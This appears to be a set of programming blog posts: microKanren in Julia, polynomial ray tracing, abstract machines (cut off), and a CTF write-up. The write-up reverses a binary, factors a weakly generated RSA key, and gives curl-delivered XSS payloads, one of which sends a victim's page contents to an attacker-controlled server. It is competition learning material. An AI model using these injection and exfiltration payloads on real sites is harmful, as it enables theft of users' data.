There is a paper about a minimal implementation call MicroKanren that has spawned many derivatives. It’s impressively short. http://webyrd.net/scheme-2013/papers/HemannMuKanren2013.pdf .

I’m intrigued about such things and have my reasons for building a version of this in Julia (perhaps as an inference engine for Catlab stuff? More on that another day). There are already some implementations, but I’m opinionated and I really wanted to be sure I know how the guts work. Best way is to DIY.

There are at least 3 already existing implementations in Julia alone.

- https://github.com/latticetower/MuKanren.jl
- https://github.com/habemus-papadum/LilKanren.jl
- https://github.com/RAbraham/MiniKanren

Logic programming consists of basically two pieces, search and unification. The search shows up as a stream. MiniKanren does a kind of clever search by interleaving looking at different branches. This stops it from getting stuck in a bad infinite branch in principle. The interleaving is kind of like a riffled list append.

```
interleave [] ys = ys
interleave (x:xs) = x : interleave ys xs
```

But then the actual streams used in Kanren have thunks lying around in them that also need to get forced. These thunk positions are where it chooses to switch over to another branch of the search.

Unification is comparing two syntax trees with variables in them. As you scan down them, you can identify which variables correspond to which subtrees in the other structure. You may find a contradictory assignment, or only a partial assignment. I talked more about unification here. Kanren uses triangular substitutions to record the variable assignments. These subsitutions are very convenient to make, but when you want to access a variable, you have to walk through the substitution. It’s a tradeoff.

Here we start describing my Julia implementation. Buyer beware. I’ve been finding very bad bugs very recently.

I diverged from microKanren in a couple ways. I wanted to not use a list based structure for unification. I feel like the most Julian thing to do is to use the Expr data structure that is built by Julia quotation `:`

. You can see here that I tried to use a more imperative style where I could figure out how to, which I think is more idiomatic Julia.

```
struct Var
x::Symbol
end
function walk(s,u)
while isa(u,Var) && haskey(s,u)
u = get(s,u)
end
return u
end
function unify(u,v,s) # basically transcribed from the microkanren paper
u = walk(s,u)
v = walk(s,v)
if isa(u,Var) && isa(v,Var) && u === v # do nothing if same
return s
elseif isa(u,Var)
return assoc(s,u,v)
elseif isa(v,Var)
return assoc(s,v,u)
elseif isa(u, Expr) && isa(v,Expr)
# Only function call expressions are implemented at the moment
@assert u.head === :call && v.head === :call
if u.args[1] === v.args[1] && length(u.args) == length(v.args) #heads match
for (u,v) in zip( u.args[2:end] , v.args[2:end] ) # unify subpieces
s = unify(u,v,s)
if s === nothing
return nothing
end
end
return s
else # heads don't match or different arity
return nothing
end
else # catchall for Symbols, Integers, etc
if u === v
return s
else
return nothing
end
end
end
```

I decided to use the `gensym`

facility of Julia to produce new variables. That way I don’t have to thread around a variable counter like microkanren does (Julia is already doing this somewhere under the hood). Makes things a touch simpler. I made a couple `fresh`

combinators for convenience. Basically you pass them an anonymous function and you get fresh logic variables to use.

```
fresh(f) = f(Var(gensym()))
fresh2(f) = f(Var(gensym()), Var(gensym()))
fresh3(f) = f(Var(gensym()), Var(gensym()), Var(gensym()))
freshn(n, f) = f([Var(gensym()) for i in 1:n ]...) # fishy lookin, but works. Not so obvious the evaluation order here.
```

Kanren is based around composing goals with disjunction and conjunction. A goal is a function that accepts a current substitution dictionary `s`

and outputs a stream of possible new substitution dictionaries. If the goal fails, it outputs an empty stream. If the goal succeeds only one way, it outputs a singleton stream. I decided to attempt to use iterators to encode my streams. I’m not sure I succeeded. I also decided to forego separating out `mplus`

and `unit`

to match the microkanren notation and inlined their definition here. The simplest implementation of conjunction and disjunction look like this.

```
# unification goal
eqwal(u,v) = s -> begin
s = unify(u,v,s)
(s == nothing) ? () : (s,)
end
# concatenate them
disj(g1,g2) = s -> Iterators.flatten( (g1(s) , g2(s)) )
# bind = "flatmap". flatten ~ join
conj(g1,g2) = s -> Iterators.flatten( map( g2 , g1(s) ))
```

However, the next level throws thunks in the mix. I think I got it to work with a special thunk Iterator type. It mutates the iterator to unthunkify it upon first forcing. I have no idea what the performance characteristics of this are.

```
# Where do these get forced. Not obvious. Do they get forced when flattened?
mutable struct Thunk #{I}
it # Union{I,Function}
end
function pull(x) # Runs the trampoline
while isa(x,Function)
x = x()
end
x
end
function Base.length(x::Thunk)
x.it = pull(x.it)
Base.length(x.it)
end
function Base.iterate(x::Thunk)
x.it = pull(x.it)
Base.iterate(x.it)
end
function Base.iterate(x::Thunk, state)
x.it = pull(x.it) # Should we assume forced?
Base.iterate(x.it, state)
end
# does this have to be a macro? Yes. For evaluation order. We want g
# evaluating after Zzz is called, not before
macro Zzz(g)
return :(s -> Thunk(() -> $(esc(g))(s)))
end
```

Then the fancier conjunction and disjunction are defined like so. I think conjunction does not need to be changed since `iterate`

takes care of the trampoline. (Edit: No this is fundamentally busted insofar as it was intended to be a miniKanren style complete search. It is instead doing something closer to depth first. I might as well not even do the swapping. I suspect one cannot use flatten as is if one wants minikanren style search. )

```
disj(g1,g2) = s -> begin
s1 = g1(s)
s2 = g2(s)
if isa(s1,Thunk) && isa(s1.it, Function) #s1.forced == false
Iterators.flatten( (s2 , s1) )
else
Iterators.flatten( (s1 , s2) )
end
end
conj(g1,g2) = s -> Iterators.flatten( map( g2 , g1(s) )) # eta expansion
```

Nice operator forms of these expressions. It’s a bummer that operator precedence is not use definable. ≅ binds more weakly than ∧ and ∨, which is not what you want.

```
∧ = conj # \wedge
∨ = disj # \vee
≅ = eqwal #\cong
```

I skipped using the association list representation of substitutions (Although Assoc Lists are in Base). I’ve seen recommendations one just use persistent dictionaries and it’s just as easy to drop that it. I’m just using a stock persistent dictionary from FunctionalCollections.jl https://github.com/JuliaCollections/FunctionalCollections.jl .

```
using FunctionalCollections
function call_empty(n::Int64, c) # gets back the iterator
collect(Iterators.take(c( @Persistent Dict() ), n))
end
function run(n, f)
q = Var(gensym())
res = call_empty(n, f(q))
return map(s -> walk_star(q,s), res)
end
# walk_star uses the substition to normalize an expression
function walk_star(v,s)
v = walk(s,v)
if isa(v,Var)
return v
elseif isa(v,Expr)
@assert v.head == :call
return Expr(v.head ,vcat( v.args[1],
map(v -> walk_star(v,s), v.args[2:end]))...)
else
return v
end
end
```

Here’s we define an append relation and an addition relation. They can be used in reverse and all sorts of funny ways!

```
function nat(n) # helper to build peano numbers
s = :zero
for i in 1:n
s = :(succ($s))
end
return s
end
function pluso(x,y,z)
(( x ≅ :zero ) ∧ (y ≅ z) ) ∨
fresh2( (n,m) -> (x ≅ :(succ($n))) ∧ (z ≅ :(succ($m))) ∧ @Zzz(pluso( n, y, m)))
end
function appendo(x,y,z)
(x ≅ :nil) ∧ (y ≅ z) ∨
fresh3( (hd, xs ,zs) -> (x ≅ :(cons($hd,$xs)) ) ∧ (z ≅ :(cons($hd, $zs))) ∧ @Zzz( appendo( xs,y,zs )))
end
```

Here we actually run them and see results to queries.

```
# add 2 and 2. Only one answer
>>> run(5, z -> pluso(nat(2), nat(2), z))
1-element Array{Expr,1}:
:(succ(succ(succ(succ(zero)))))
>>> run(5, z -> fresh2( (x,y) -> (z ≅ :( tup($x , $y))) ∧ pluso(x, :(succ(zero)), y)))
5-element Array{Expr,1}:
:(tup(zero, succ(zero)))
:(tup(succ(zero), succ(succ(zero))))
:(tup(succ(succ(zero)), succ(succ(succ(zero)))))
:(tup(succ(succ(succ(zero))), succ(succ(succ(succ(zero))))))
:(tup(succ(succ(succ(succ(zero)))), succ(succ(succ(succ(succ(zero)))))))
>>> run(3, q -> appendo( :(cons(3,nil)), :(cons(4,nil)), q ) )
1-element Array{Expr,1}:
:(cons(3, cons(4, nil)))
# subtractive append
>>> run(3, q -> appendo( q, :(cons(4,nil)), :(cons(3, cons(4, nil))) ) )
1-element Array{Expr,1}:
:(cons(3, nil))
# generate partitions
>>> run(10, q -> fresh2( (x,y) -> (q ≅ :(tup($x,$y))) ∧ appendo( x, y, :(cons(3,cons(4,nil))) )))
3-element Array{Expr,1}:
:(tup(nil, cons(3, cons(4, nil))))
:(tup(cons(3, nil), cons(4, nil)))
:(tup(cons(3, cons(4, nil)), nil))
```

I really should implement the occurs check

Other things that might be interesting: Using Async somehow for the streams. Store the substitutions with mutation or do union find unification. Constraint logic programming. How hard would it be get get JuMP to tag along for the ride?

It would probably be nice to accept Expr for tuples and arrays in addition to function calls.

http://minikanren.org/ You may also want to check out the book The Reasoned Schemer.

http://io.livecode.ch/ online interactive minikanren examples

http://tca.github.io/veneer/examples/editor.html more minikanren examples.

Microkanren implementation tutorial https://www.youtube.com/watch?v=0FwIwewHC3o . Also checkout the Kanren online meetup recordings https://www.youtube.com/user/WilliamEByrd/playlists

Efficient representations for triangular substitutions – https://users.soe.ucsc.edu/~lkuper/papers/walk.pdf

https://github.com/ekmett/guanxi https://www.youtube.com/watch?v=D7rlJWc3474&ab_channel=MonadicWarsaw

Could it be fruitful to work natively with Catlab’s GATExpr? Synquid makes it seem like extra typing information can help the search sometimes.

LogicT http://okmij.org/ftp/Computation/LogicT.pdf

Seres Spivey http://www.jucs.org/jucs_6_4/functional_reading_of_logic

Hinze backtracking https://dl.acm.org/doi/abs/10.1145/357766.351258

]]>The “easy” problems were ass kickers. I guess they were easy in the sense that total n00bs like us could eventually get them. But good lord. It seems inhuman to me that there are people rocking these things, but there are.

We were able to finish 3 problems and got close to a 4th.

There are similar write ups here https://ctftime.org/event/1041/tasks/ . Doesn’t seem like I did anything that unusual.

This one was a binary that needed a password inputted . I booted up Ghidra to take a look at the binary which helped a lot in seeing a decompiled version. I’ve never really used Ghidra before. This is what Ghidra showed

```
ulong main(void)
{
int iVar1;
uint uVar2;
undefined auVar3 [16];
undefined input [16];
undefined4 local_28;
undefined4 uStack36;
undefined4 uStack32;
undefined4 uStack28;
printf("Flag: ");
__isoc99_scanf(&DAT_0010200b,input);
auVar3 = pshufb(input,SHUFFLE);
auVar3 = CONCAT412(SUB164(auVar3 >> 0x60,0) + ADD32._12_4_,
CONCAT48(SUB164(auVar3 >> 0x40,0) + ADD32._8_4_,
CONCAT44(SUB164(auVar3 >> 0x20,0) + ADD32._4_4_,
SUB164(auVar3,0) + ADD32._0_4_))) ^ XOR;
local_28 = SUB164(auVar3,0);
uStack36 = SUB164(auVar3 >> 0x20,0);
uStack32 = SUB164(XOR >> 0x40,0);
uStack28 = SUB164(XOR >> 0x60,0);
iVar1 = strncmp(input,(char *)&local_28,0x10);
if (iVar1 == 0) {
uVar2 = strncmp((char *)&local_28,EXPECTED_PREFIX,4);
if (uVar2 == 0) {
puts("SUCCESS");
goto LAB_00101112;
}
}
uVar2 = 1;
puts("FAILURE");
LAB_00101112:
return (ulong)uVar2;
}
```

```
001010a9 e8 b2 ff CALL __isoc99_scanf undefined __isoc99_scanf()
ff ff
001010ae 66 0f 6f MOVDQA XMM0,xmmword ptr [RSP]=>input
04 24
001010b3 48 89 ee MOV RSI,RBP
001010b6 4c 89 e7 MOV RDI,R12
001010b9 ba 10 00 MOV EDX,0x10
00 00
001010be 66 0f 38 PSHUFB XMM0,xmmword ptr [SHUFFLE] =
00 05 a9
2f 00 00
001010c7 66 0f fe PADDD XMM0,xmmword ptr [ADD32] =
05 91 2f = null
00 00
001010cf 66 0f ef PXOR XMM0,xmmword ptr [XOR] =
05 79 2f
00 00
001010d7 0f 29 44 MOVAPS xmmword ptr [RSP + local_28],XMM0
24 10
001010dc e8 4f ff CALL strncmp int strncmp(char * __s1, char *
ff ff
001010e1 85 c0 TEST EAX,EAX
001010e3 75 1b JNZ LAB_00101100
001010e5 48 8b 35 MOV RSI=>DAT_00102020,qword ptr [EXPECTED_PREFIX] = 00102020
94 2f 00 00 = 43h C
001010ec ba 04 00 MOV EDX,0x4
00 00
001010f1 48 89 ef MOV RDI,RBP
001010f4 e8 37 ff CALL strncmp int strncmp(char * __s1, char *
ff ff
```

Actually having this in ghidra makes this easier to see than it is here because Ghidra tells you which line of C is which line of assembly. Basically, it appears (after looking up some assembly instructions) that we need to find a string that after shuffling by a fixed pattern (SHUFFLE), packed adding a constant (ADD32), and xoring with a constant (XOR) equals itself.

I suppose this must be solvable by hand? They are suspiciously reversible operations. But I ended up using Z3 because I already know it pretty well. Something that made me totally nuts was translating byte ordering between x86 and z3. The only way I was able to do it was to go into gdb and go through the program instruction and make sure xmm0 had the same values as z3.

```
gdb a.out
break main
run
tui enable
layout asm
ni a bunch of times
print $xmm0
```

Then I put in the appropriate list reversals or reversed the bytes of the binary constants. It wasn’t so bad once I realized I had to do that.

```
from z3 import *
x = BitVec('x', 128)
#print(Extract(,0,x))
chunks8 = [ Extract(i*8+7, 8*i,x ) for i in range(16)]
#print([print for chunk in chunks8])
print(chunks8)
shuffle = [0x02 ,0x06 ,0x07 , 0x01, 0x05, 0x0b, 0x09, 0x0e, 0x03 , 0x0f ,0x04 ,0x08, 0x0a, 0x0c, 0x0d, 0x00]
#shuffle = [ 16 - i for i in shuffle ] #?? Endian? # for z3 ,extract 0 is the least significant
shufflex = [chunks8[shuf] for shuf in shuffle]
shufflex = Concat(list(reversed(shufflex)))
print(shufflex)
chunks32 = [ Extract(i*32+31, 32*i,shufflex ) for i in range(4)] #[Concat( shufflex[4*i: 4*i+4]) ) for i in range(4)]
print(chunks32)
#add32 = [0xefbeadde, 0xaddee1fe, 0x37133713, 0x66746367]
add32 = [0xedeadbeef, 0xfee1dead, 0x13371337, 0x67637466]
added = [ chunk + addo for chunk,addo in zip(chunks32,add32) ]
print(added)
xnew = Concat(list(reversed(added))) ^ 0xAAF986EB34F823D4385F1A8D49B45876 # 0x7658b4498d1a5f38d423f834eb86f9aa
print(xnew)
s = Solver()
s.add(xnew == x)
#s.add(x != 649710491438454045931875052661658691 )
#s.add(Extract( 4*8-1 , 0, xnew) == 0x102020 ) # 0x202010
print(s.check())
m = s.model()
print(m)
print(m.eval(xnew))
#bit32chunks = [ Extract(high, low, x) for i in range(4)]
#lower = Extract(31, 0, x)
#lower = Extract(31, 0, x)
#x = BitVec('addx', 128)
#[ Extract(high, low, x) for i in range(0,16)]
```

I still don’t understand what is going on with the EXPECTED_PREFIX part. Somehow that memory gets filled with “CTF”, even though it doesn’t have that in the binary file. So maybe that is a red herring?

I wonder if KLEE would’ve just found it or if there was some other automated tool that would’ve worked? I see that one write up used angr

This one had a verilog file and a verilator C++ file. Basically, a string is clocked into a circuit which does some minimal scrambling and then sets a flag once a good key has been sent in. An unexpectedly hard part was figuring out how to get verilator to work, which wasn’t strictly necessary. Another hard part was realizing that I was supposed to netcat the key into a server. Somehow I just totally ignored the url that was in the question prompt

Again, I used my formal method super powers just because. I downloaded EBMC, although yosys smtbmc would probably also work

` ~/Downloads/ebmc check.sv --trace --bound 100`

I edited the file slightly. I turned `always_ff`

into `always`

since ebmc didn’t seem to support it. I also initialized the memory to zero so that I could get an actual trace and asserted that `open_safe == 0`

so that it would give me a countermodel that opens the safe. ebmc returned a trace, which I sent over netcat to the server and got the real key. One could back out the key by hand here, since it is fairly simple scrambling.

```
module check(
input clk,
input [6:0] data,
output wire open_safe
);
reg [6:0] memory [7:0];
reg [2:0] idx = 0;
//initial begin
// memory[0] = 7'b1000011;
// memory[5] = 7'b1010100;
// memory[2] = 7'b1010100;
// memory[7] = 7'b1111011 ; // 7'x7b;
//end
integer i;
initial begin
for (i=0;i<8;i=i+1)
memory[i] = 0;
end
wire [55:0] magic = {
{memory[0], memory[5]},
{memory[6], memory[2]},
{memory[4], memory[3]},
{memory[7], memory[1]}
};
wire [55:0] kittens = { magic[9:0], magic[41:22], magic[21:10], magic[55:42] };
assign open_safe = kittens == 56'd3008192072309708;
always @(posedge clk) begin
memory[idx] <= data;
idx <= idx + 5;
end
assert property (open_safe==0); // || memory[0] == 7'b110111); //|| memory[0] != b00110111
endmodule
```

This one kicked my ass. I know basically nothing about crypto. The prompt was that there is a file that generates primes for an RSA encrytion. They are using a fishy looking generator for the primes.

```
#!/usr/bin/python3 -u
import random
from Crypto.Util.number import *
import gmpy2
a = 0xe64a5f84e2762be5
chunk_size = 64
def gen_prime(bits):
s = random.getrandbits(chunk_size)
while True:
s |= 0xc000000000000001
p = 0
for _ in range(bits // chunk_size):
p = (p << chunk_size) + s
s = a * s % 2**chunk_size
if gmpy2.is_prime(p):
return p
n = gen_prime(1024) * gen_prime(1024)
e = 65537
flag = open("flag.txt", "rb").read()
print('n =', hex(n))
print('e =', hex(e))
print('c =', hex(pow(bytes_to_long(flag), e, n)))
```

I went up a couple blind alleys. The first thing we tried was brute forcing. Maybe if the generator is incredibly weak, we can just generate 1,000,000 primes and we’ll get a match. No such luck.

Second I tried interpreting the whole problem into Z3 and Boolector. This did not work either. In hindsight, maybe it could have? Maybe I messed up somewhere in this code?

```
import random
from Crypto.Util.number import *
import gmpy2
from z3 import *
#x = BitVec('n', 1024)
prime_size = 1024
chunk_size = 64
s1 = ZeroExt(2*prime_size - chunk_size, BitVec('s1', chunk_size)) #prime_size)
s2 = ZeroExt(2*prime_size - chunk_size, BitVec('s2', chunk_size))
a = 0xe64a5f84e2762be5
def gen_prime(s, bits):
s |= 0xc000000000000001
p = 0
for _ in range(bits // chunk_size):
p = (p << chunk_size) + s
s = a * s % 2**chunk_size
return p
def gen_prime(s, bits):
s |= 0xc000000000000001
p = 0
for _ in range(bits // chunk_size):
p = (p << chunk_size) + s
s = a * s % 2**chunk_size
return p
p = gen_prime(s1,prime_size)
q = gen_prime(s2,prime_size)
#n = 0xab802dca026b18251449baece42ba2162bf1f8f5dda60da5f8baef3e5dd49d155c1701a21c2bd5dfee142fd3a240f429878c8d4402f5c4c7f4bc630c74a4d263db3674669a18c9a7f5018c2f32cb4732acf448c95de86fcd6f312287cebff378125f12458932722ca2f1a891f319ec672da65ea03d0e74e7b601a04435598e2994423362ec605ef5968456970cb367f6b6e55f9d713d82f89aca0b633e7643ddb0ec263dc29f0946cfc28ccbf8e65c2da1b67b18a3fbc8cee3305a25841dfa31990f9aab219c85a2149e51dff2ab7e0989a50d988ca9ccdce34892eb27686fa985f96061620e6902e42bdd00d2768b14a9eb39b3feee51e80273d3d4255f6b19
#n = 0x90000000000055e4350fbb6baa0349fbde32f2f237fa10573dd3d46b
#n = BitVecVal("0x90000000000055e4350fbb6baa0349fbde32f2f237fa10573dd3d46b", 64)
n = BitVec("n",2048) #(declare-const n (_ BitVec 224) )
#s = parse_smt2_string( " (assert (= n #x900000000001165742e188538bc53a3e129279c049360928a59b2de9))" , decls={"n": n})
#n = BitVecVal(0x90000000000055e4350fbb6baa0349fbde32f2f237fa10573dd3d46b, 64)
#print(hex(int(str(n)))) 0xd3899acc7973d22e820d41b4ef33cd232a98366c40fb1d70df2650ca0a96560672496f93afa03e8252a4e63054971cfa8352c9a73504a5caf35f3f5146ffd5f5762480b8140e1230864d3d0edf012bb3dd39b8ce089a64a8935a039e50f8e2ec02d514c892439242257a9bc0f377e5cc1994803cc63697b8aa5ee662a3efa96fb3e6946432e6e86987dabf5d31c7aa650c373b6b00a2cf559e9cfb8f38dc7762d557c45674dde0b5867c8d029a79a89a5feed5b24754bddb10084327fdad0303a09fb3b9306b9439489474dfb5f505460f63a135e85d0e5f71986e1cbce27b3bf3897aa8354206c431850da65cac470f0c1180bbfd4615020bfd5fdaafa2afad
#s = Solver()
bv_solver = Solver()
'''Then(With('simplify', mul2concat=True),
'solve-eqs',
'bit-blast',
'sat').solver() '''
s = bv_solver
#nstr = "#xd3899acc7973d22e820d41b4ef33cd232a98366c40fb1d70df2650ca0a96560672496f93afa03e8252a4e63054971cfa8352c9a73504a5caf35f3f5146ffd5f5762480b8140e1230864d3d0edf012bb3dd39b8ce089a64a8935a039e50f8e2ec02d514c892439242257a9bc0f377e5cc1994803cc63697b8aa5ee662a3efa96fb3e6946432e6e86987dabf5d31c7aa650c373b6b00a2cf559e9cfb8f38dc7762d557c45674dde0b5867c8d029a79a89a5feed5b24754bddb10084327fdad0303a09fb3b9306b9439489474dfb5f505460f63a135e85d0e5f71986e1cbce27b3bf3897aa8354206c431850da65cac470f0c1180bbfd4615020bfd5fdaafa2afad"
nstr = "#xab802dca026b18251449baece42ba2162bf1f8f5dda60da5f8baef3e5dd49d155c1701a21c2bd5dfee142fd3a240f429878c8d4402f5c4c7f4bc630c74a4d263db3674669a18c9a7f5018c2f32cb4732acf448c95de86fcd6f312287cebff378125f12458932722ca2f1a891f319ec672da65ea03d0e74e7b601a04435598e2994423362ec605ef5968456970cb367f6b6e55f9d713d82f89aca0b633e7643ddb0ec263dc29f0946cfc28ccbf8e65c2da1b67b18a3fbc8cee3305a25841dfa31990f9aab219c85a2149e51dff2ab7e0989a50d988ca9ccdce34892eb27686fa985f96061620e6902e42bdd00d2768b14a9eb39b3feee51e80273d3d4255f6b19"
s.add(parse_smt2_string( f" (assert (= n {nstr}))" , decls={"n": n}))
#s.add( s1 < 2**chunk_size)
#s.add( s2 < 2**chunk_size)
s.add(s1 <= s2)
s.add( p * q == n)
set_option(verbose=10)
print(s.to_smt2())
print(s.check())
m = s.model()
print(m)
print(m.eval(p))
print(m.eval(q))
```

We also tried using this tool and see if we got any hits. https://github.com/Ganapati/RsaCtfTool Didn’t work. An interesting resource in any case, and I ended up using to to actually do the decryption once I had the primes.

Reading the problem prompt I realized they were emphasizing the way the random number generator was constructed. It turns out that this generator has a name https://en.wikipedia.org/wiki/Lehmer_random_number_generator . This did not lead to any revelations, so is actually a counter productive observation.

Anyway, looking at it, each 64 bit chunk is kind of independent of each other in the primes. And when you multiply the built primes, the chunks still don’t interweave all the much, especially the most and least significant chunk of n. Eventually I realized that the first and last chunk of the key n are simply related to the product of the 2 random numbers `s`

used to generate the primes. The least significant chunk of `n = s1 * s2 * a^30 mod 2^64`

. And the most significant chunk of n is the most significant 64 bits of s1 * s2 ( minus an unknown but small number of carries). We can reverse the a^30 by using the modular inverse of a which I used a web form to calculate. Then we basically have the product of s1 and s2. s1 and s2 are not primes, and this is a much smaller problem, so factoring these numbers is not a challenge.

```
import random
from Crypto.Util.number import *
import gmpy2
for q in range(16): # search over possible carries
#e = q * 2 ** 64
#print(hex(e))
backn = 0x0273d3d4255f6b19 # least sig bits of n
frontn = 0xab802dca026b1825 - q # most sig bits of n minus some carry
chunk_size = 64
bits = 1024
a = 0xe64a5f84e2762be5 #16594180801339730917
ainv = 13928521563655641581 # modular inverse wrt 2^64 https://www.dcode.fr/modular-inverse
n0 = gmpy2.mpz("0xab802dca026b18251449baece42ba2162bf1f8f5dda60da5f8baef3e5dd49d155c1701a21c2bd5dfee142fd3a240f429878c8d4402f5c4c7f4bc630c74a4d263db3674669a18c9a7f5018c2f32cb4732acf448c95de86fcd6f312287cebff378125f12458932722ca2f1a891f319ec672da65ea03d0e74e7b601a04435598e2994423362ec605ef5968456970cb367f6b6e55f9d713d82f89aca0b633e7643ddb0ec263dc29f0946cfc28ccbf8e65c2da1b67b18a3fbc8cee3305a25841dfa31990f9aab219c85a2149e51dff2ab7e0989a50d988ca9ccdce34892eb27686fa985f96061620e6902e42bdd00d2768b14a9eb39b3feee51e80273d3d4255f6b19")
abackn = backn # mutiply a^inv ** (30? or 32?) * backn = s1 * s2 mod 2**64
for _ in range(bits // chunk_size - 1):
abackn = ainv * abackn % 2**chunk_size
abackn = ainv * abackn % 2**chunk_size
print("abackn ", hex(abackn))
def prime_factors(n): # all prime factors, from a stack exchange post
i = 2
factors = []
while i * i <= n:
#print(i)
if n % i:
i += 1
else:
n //= i
factors.append(i)
if n > 1:
factors.append(n)
return factors
def gen_prime_s(s,bits):
s |= 0xc000000000000001
p = 0
for _ in range(bits // chunk_size):
p = (p << chunk_size) + s
s = a * s % 2**chunk_size
return p
print(len(hex(abackn)))
tot_ss = (frontn * (2 ** (chunk_size))) + abackn # combine the front and back. Should = s1 * s2
print("frontbk", hex(tot_ss))
print(len(hex(tot_ss)))
g = prime_factors( tot_ss)
print(g)
ng = len(g)
for i in range(2**ng): # try all ways of splitting prime list. Could do something less stupid, but whatev
s1 = 1
s2 = 1
for x in range(ng):
if (i >> x) & 1:
s1 *= g[x]
else:
s2 *= g[x]
p = gen_prime_s(s1,1024)
q = gen_prime_s(s2,1024)
n = p*q
if n == n0:
print("holy shit")
print(f"p = {p}", )
print(f"q = {q}", )
```

Strangely enough the web was also pretty hard. This is partially because this is getting further from stuff I know about. We ended up not finishing this one but I think we got close. We’re given access to a notes web app. Looking at the source, it turns out the server source was also being served. Eventually we figured out that we could curl in notes in an unexpected format using url-encoding which was conspicuously enabled in body-parser. The sanitizer makes the assumption that it is receiving a string, not an object. When the sanitizer removes the quotes from the JSON.stringify, it actually can remove an opening brace {, and then the first label of the object closes the string. When the note text is spliced into the webpage it isn’t properly escaped. We were able to get code to run via sending in an object with labels that were javascript code

```
curl -d 'content[;a=4;alert();]=;7;&content[;a=5;]=;4;' -H "Content-Type: application/x-www-form-urlencoded" -X POST https://pasteurize.web.ctfcompetition.com/
```

By running an ajax request we could recevie data from TJMike’s browser

```
curl -d 'content[;var xhttp = new XMLHttpRequest();xhttp.open(`POST`, `https://ourserver`, true);xhttp.send(document.documentElement.innerHTML);]=;7;&content[;a=5;]=;4;' -H "Content-Type: application/x-www-form-urlencoded" -X POST https://pasteurize.web.ctfcompetition.com/
```

We were at the time limit then. I’ve heard we needed to grab the document.cookies and that had the key in it?

All told pretty cool. A very well organized CTF with fun challenges. I dunno if CTFs are for me. I felt my blood pressure raising a lot.

]]>You can add a great deal of complexity to this by more sophisticated sampling and lighting, multiple bounces, strange surfaces, but that’s it in a nutshell.

A very popular tutorial on this is Ray Tracing in One Weekend https://raytracing.github.io/

There are a couple ways to do the geometrical collision detection part. One is to consider simple shapes like triangles and spheres and find closed form algorithms for the collision point. This is a fast and simple approach and the rough basis of the standard graphics pipeline. Another is to describe shapes via signed distance functions that tell you how far from the object you are and use ray-marching, which is a variant of newton’s method iteratively finding a position on a surface along the ray. ShaderToys very often use this technique.

If you describe your objects using algebraic (polynomial) equations, like describes a sphere, there is the possibility of using root finding algorithms, which are readily available. I thought this was kind of neat. Basically the ray hitting the concrete pixel can be parameterized by a univariate polynomial , which can be plugged into the multivariate polynomial . This is a univariate polynomial which can be solved for all possible collision points via root finding. We filter for the collisions that are closest and in front of the camera. We can also use partial differentiation of the surface equations to find normal vectors at that point for the purposes of simple directional lighting.

As is, it really isn’t very fast but it’s short and it works.

Three key packages are

- https://github.com/JuliaAlgebra/TypedPolynomials.jl for multivariate polynomials
- https://juliamath.github.io/Polynomials.jl/stable/ for univariate polynomials
- https://github.com/JuliaImages/Images.jl Images for drawing Images

```
using Images
using LinearAlgebra
using TypedPolynomials
using Polynomials
function raytrace(x2,y2,p)
z = Polynomials.Polynomial([0,1])
# The ray parameterized by z through the origin and the point [x2,y2,1]
x3 = [z*x2, z*y2, z]
# get all the roots after substitution into the surface equation
r = roots(p(x=>x3))
# filter to use values of z that are real and in front of the camera
hits = map(real, filter( x -> isreal(x) & (real(x) > 0.0) , r))
if length(hits) > 0
l = minimum(hits) # closest hit only
x3 = [z(l) for z in x3]
# get normal vector of surface at that point
dp = differentiate(p, x)
normal = normalize([ z(x=> x3) for z in dp])
# a little directional and ambient shading
return max(0,0.5*dot(normal,normalize([0,1,-1]))) + 0.2
else
return 0 # Ray did not hit surface
end
end
@polyvar x[1:3]
# a sphere of radius 1 with center at (0,0,3)
p = x[1]^2 + x[2]^2 + (x[3] - 3)^2 - 1
box = -1:0.01:1
Gray.([ raytrace(x,y,p) for x=box, y=box ])
```

Sphere.

```
@polyvar x[1:3]
R = 2
r = 1
# another way of doing offset
x1 = x .+ [ 0, 0 , -5 ]
# a torus at (0,0,5)
# equation from https://en.wikipedia.org/wiki/Torus
p = (x1[1]^2 + x1[2]^2 + x1[3]^2 + R^2 - r^2)^2 - 4R^2 * (x1[1]^2 + x1[2]^2)
box = -1:0.005:1
img = Gray.([ raytrace(x,y,p) for x=box, y=box ])
save("torus.jpg",img)
```

Some thoughts on speeding up: Move polynomial manipulations out of the loop. Perhaps partial evaluate with respect to the polynomial? That’d be neat. And of course, parallelize

]]>Functional programming is cool and useful, but it isn’t clear how to implement the features they provide on hardware that is controlled by assembly code. Achieving this is a fairly large topic. One step on the way is the concept of an abstract machine.

Abstract machines make more explicit how to evaluate a program by defining a step relationship taking a state of the machine to another state. I think this may be closer to how hardware is built because hardware is physical system. Physical systems are often characterizable by their space of states and the transitions or time evolution of them. That’s Newtonian mechanics in a nutshell.

There is a methodology by which to connect the definitions of abstract machines to interpreters of lambda calculus.

- Convert to continuation passing style to make the evaluation order explicit
- Defunctionalize these continuations

However, the lambda calculus is a non trivial beast and really only a member of a spectrum of different programming language features. Here is an incomplete set of features that you can mix and match:

- Arithmetic expressions
- Boolean expressions
- let bindings
- Printing/Output
- Reading/Input
- Mutation, References
- For/While loops
- Named Global Procedures
- Recursion
- Lambda terms / Higher Order Functions
- Call/CC
- error throw try catch
- Algebraic Data Types
- Pattern matching

In my opinion, the simplest of any of these is arithmetic expressions and with only this you can already meaningfully explore this evaluator to abstract machine translation.

First we need a data type for arithmetic

`data AExpr = Lit Int | Add AExpr AExpr deriving (Eq, Show)`

Pretty basic. We could easily add multiplication and other operators and it doesn’t change much conceptually except make things larger. Then we can define a simple interpreter.

```
type Value = Int
eval :: AExpr -> Value
eval (Add x y) = (eval x) + (eval y)
eval (Lit i) = i
```

The first step of our transformation is to put everything in continuation passing style (cps). The way this is done is to add an extra parameter `k`

to every function call. When we want to return a result from a function, we now call `k`

with that instead. You can kind of think of it as a goofy `return`

statement. `eval'`

is equivalent to `eval`

above.

```
evalk :: AExpr -> (Value -> Value) -> Value
evalk (Add x y) k = evalk x (\vx -> (evalk y $ \vy -> k (vx + vy)))
evalk (Lit i) k = k i
eval' :: AExpr -> Value
eval' e = evalk e id
```

Now we defunctionalize this continuation. We note that higher order continuation parameters take only a finite number of possible shapes if `evalk`

is only accessed via the above code. `k`

can either be `id`

, `(\vx -> (evalk y $ \vy -> k (vx + vy)))`

, or `\vy -> k (vx + vy)`

. We give each of these code shapes a constructor in a data type. The constructor needs to hold any values closed over (free variables in the expression). `id`

needs to remember nothing, `\vx -> (evalk y $ \vy -> k (vx + vy))`

needs to remember `y`

and `k`

, and `\vy -> k (vx + vy)`

